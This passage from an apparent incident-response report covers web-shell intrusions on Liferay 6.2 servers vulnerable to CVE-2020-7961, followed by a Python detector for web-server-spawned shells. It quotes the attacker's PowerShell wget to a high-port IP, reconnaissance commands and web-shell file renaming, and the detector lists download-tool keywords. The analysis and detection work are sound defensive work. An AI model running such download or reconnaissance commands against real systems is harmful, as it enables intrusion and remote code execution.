Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).
Incident # 2
Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.
Our analysis shows that a Wget request was sent to a URL on a high-numbered port. Unfortunately, we don’t have information as to what was downloaded, since the URL was already dead by the time of analysis.
"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
cmd.exe /c ipconfig
cmd.exe /c dir
"c:\windows\system32\cmd.exe" /c ping -n 1 google.com
"c:\windows\system32\cmd.exe" /c whoami
The web shell was then copied and the original entry deleted using the following commands:
cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
"c:\windows\system32\cmd.exe" /c del
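The three command groups above (a PowerShell download from a high-numbered port, a burst of basic reconnaissance commands, and a rename/delete of the web shell file under the web root) are all visible in process-creation telemetry if the web server process is spawning shells. The following is an added detection example, not code from the original report or from any vendor tooling: it walks over constructed Sysmon-style process-creation records (parent image, image, command line), flags shells whose parent is the IIS worker process (w3wp.exe, an assumption based on the inetpub\wwwroot and .aspx paths in the incident), and then tags download commands to non-standard ports, recon commands, and file tampering under wwwroot. The sample records and the RFC 5737 documentation-range IP address are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample process-creation records (not from the original report).
# Format: parent_image|image|command_line. 203.0.113.10 is a documentation-range
# placeholder standing in for the attacker-controlled host.
SAMPLE_EVENTS = [
    r'w3wp.exe|cmd.exe|"C:\Windows\System32\cmd.exe" /c powershell wget http://203.0.113.10:56138/iMCRufG79yXvYjH0W1SK',
    r"w3wp.exe|cmd.exe|cmd.exe /c ipconfig",
    r"w3wp.exe|cmd.exe|cmd.exe /c dir",
    r'w3wp.exe|cmd.exe|"c:\windows\system32\cmd.exe" /c ping -n 1 google.com',
    r'w3wp.exe|cmd.exe|"c:\windows\system32\cmd.exe" /c whoami',
    r"w3wp.exe|cmd.exe|cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx",
    r"explorer.exe|cmd.exe|cmd.exe /c ipconfig",  # interactive admin use, not spawned by the web server
    r"services.exe|svchost.exe|svchost.exe -k netsvcs",
]

# Assumption for this example: the web shell runs inside the IIS worker process.
WEB_SERVER_PARENTS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RECON_CMDS = ("ipconfig", "whoami", "dir", "ping", "systeminfo", "net user", "tasklist")
DOWNLOAD_TOKENS = ("wget", "curl", "invoke-webrequest", "iwr", "downloadstring", "downloadfile", "certutil")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
FILE_OP_RE = re.compile(r"\b(ren|rename|del|erase|move|copy)\b")


@dataclass
class Finding:
    rule: str
    detail: str
    command_line: str


def parse_event(line: str):
    """Split one record into (parent_image, image, command_line); images are lower-cased."""
    parent, image, cmdline = line.split("|", 2)
    return parent.lower(), image.lower(), cmdline


def url_port(url: str) -> int:
    """Return the explicit port of a URL, or the scheme default (80/443) when none is given."""
    parsed = urlparse(url)
    if parsed.port is not None:
        return parsed.port
    return 443 if parsed.scheme.lower() == "https" else 80


def analyze(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        parent, image, cmd = parse_event(line)
        # Only shells spawned by the web server process are web-shell candidates.
        if parent not in WEB_SERVER_PARENTS or image not in SHELLS:
            continue
        low = cmd.lower()
        findings.append(Finding("webserver_spawned_shell", f"{parent} -> {image}", cmd))

        # Download tooling fetching from a port other than 80/443.
        if any(tok in low for tok in DOWNLOAD_TOKENS):
            for url in URL_RE.findall(cmd):
                port = url_port(url)
                if port not in (80, 443):
                    findings.append(Finding("download_nonstandard_port", f"port {port} in {url}", cmd))

        # Rename/delete/copy of files under the web root (web shell staging or cleanup).
        if FILE_OP_RE.search(low) and "wwwroot" in low:
            findings.append(Finding("webroot_file_tamper", "file operation under web root", cmd))

        # Basic host reconnaissance run through "cmd.exe /c <tool>".
        for tok in RECON_CMDS:
            if re.search(r"/c\s+" + re.escape(tok) + r"\b", low):
                findings.append(Finding("recon_command", tok, cmd))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per rule so a triage view can show the pattern at a glance."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.rule}] {f.detail}: {f.command_line}")
    print(summarize(results))
```

Running this over the constructed records yields one download-to-high-port finding, four recon findings, one web-root tampering finding and six web-server-spawned shells, while the two non-IIS records are ignored. In a real deployment the parent-image check is what keeps the noise down: ipconfig and whoami are ordinary on an administrator's console but almost never legitimate children of w3wp.exe.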